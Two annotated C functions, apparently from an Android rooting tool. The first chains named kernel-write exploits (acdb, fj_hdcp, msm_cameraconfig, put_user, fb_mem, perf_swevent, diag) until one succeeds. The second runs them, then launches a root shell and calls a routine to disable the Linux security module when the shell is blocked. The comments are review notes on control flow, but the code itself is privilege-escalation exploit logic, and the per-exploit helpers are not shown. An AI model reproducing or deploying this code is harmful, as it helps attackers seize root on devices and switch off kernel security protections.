Example #1
/*
 * Try each kernel-write helper in a fixed order and stop at the first one
 * that returns true.
 *
 * address, write_value and restore_value are passed through unchanged.
 * The perf_swevent and diag helpers do not receive restore_value, and the
 * perf_swevent helper is additionally handed run_callback.
 * callback_func and callback_param are only stored in the callback_info_t
 * given to each helper; this function never calls the callback itself.
 *
 * Returns info.result once a helper returns true, and false when every
 * helper returns false. A helper returning true is therefore not the same
 * as success: the result stays false unless something sets it, presumably
 * the callback run by the helper (the helpers are not shown here).
 */
bool
attempt_exploit(unsigned long int address,
                unsigned long int write_value,
                unsigned long int restore_value,
                exploit_callback_t callback_func,
                void *callback_param)
{
  callback_info_t cb;

  // Pessimistic default: only code outside this function can flip it.
  cb.result = false;
  cb.param = callback_param;
  cb.func = callback_func;

  // The order below is the original author's "most stable first" ranking.

  printf("Attempt acdb exploit...\n");
  if (attempt_acdb_exploit(address, write_value, restore_value, &cb)) {
    goto handled;
  }
  printf("\n");

  printf("Attempt fj_hdcp exploit...\n");
  if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &cb)) {
    goto handled;
  }
  printf("\n");

  printf("Attempt msm_cameraconfig exploit...\n");
  if (attempt_msm_cameraconfig_exploit(address, write_value, restore_value, &cb)) {
    goto handled;
  }
  printf("\n");

  printf("Attempt put_user exploit...\n");
  if (attempt_put_user_exploit(address, write_value, restore_value, &cb)) {
    goto handled;
  }
  printf("\n");

  printf("Attempt fb_mem exploit...\n");
  if (attempt_fb_mem_exploit(address, write_value, restore_value, &cb)) {
    goto handled;
  }
  printf("\n");

  // Different entry-point shape: no restore_value, takes run_callback.
  printf("Attempt perf_swevent exploit...\n");
  if (perf_swevent_run_exploit(address, write_value, &run_callback, &cb)) {
    goto handled;
  }
  printf("\n");

  // Last resort; unlike the others it prints no progress line of its own here.
  if (attempt_diag_exploit(address, write_value, &cb)) {
    goto handled;
  }

  return false;

handled:
  return cb.result;
}
Example #2
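/*
 * Entry point. Control flow as written:
 *   1. Call attempt_fb_mem_exploit(); only if it returns false, call
 *      run_other_exploits(). If both return false, print a failure message
 *      and exit with EXIT_FAILURE.
 *   2. Replace the process image with SHELL_PATH.
 *   3. If that exec fails, report the reason unless it was EPERM, then call
 *      attempt_to_disable_lsm() and exec SHELL_PATH a second time.
 *
 * Returns only when the final execl() fails (its -1 becomes the exit status).
 *
 * Review notes:
 *   - execl() never returns on success, so a comparison of its return value
 *     with 0 can never be true; the failure path is simply the code after it.
 *   - The LSM step runs after any exec failure, not only EPERM; the errno
 *     test gates the message alone. Presumably EPERM is treated as "blocked
 *     by the LSM" -- confirm against attempt_to_disable_lsm().
 *   - What the system observes is a failed exec of SHELL_PATH followed by a
 *     second exec of the same path from the same process, with whatever
 *     attempt_to_disable_lsm() does in between.
 */
int
main(int argc, char **argv)
{
  int exec_errno;

  // Command-line arguments are not used.
  (void)argc;
  (void)argv;

  if (!attempt_fb_mem_exploit() && !run_other_exploits()) {
    printf("failed to get root access\n");
    exit(EXIT_FAILURE);
  }

  // The variadic sentinel must be a char pointer; a bare NULL is not
  // guaranteed to have pointer type or width on every platform.
  execl(SHELL_PATH, SHELL_PATH, (char *)NULL);

  // Reaching this line means the exec failed. Save errno before any other
  // library call can overwrite it.
  exec_errno = errno;
  if (exec_errno != EPERM) {
    printf("Failed to execute shell due to %s.\n", strerror(exec_errno));
  }

  if (!attempt_to_disable_lsm()) {
    exit(EXIT_FAILURE);
  }
  return execl(SHELL_PATH, SHELL_PATH, (char *)NULL);
}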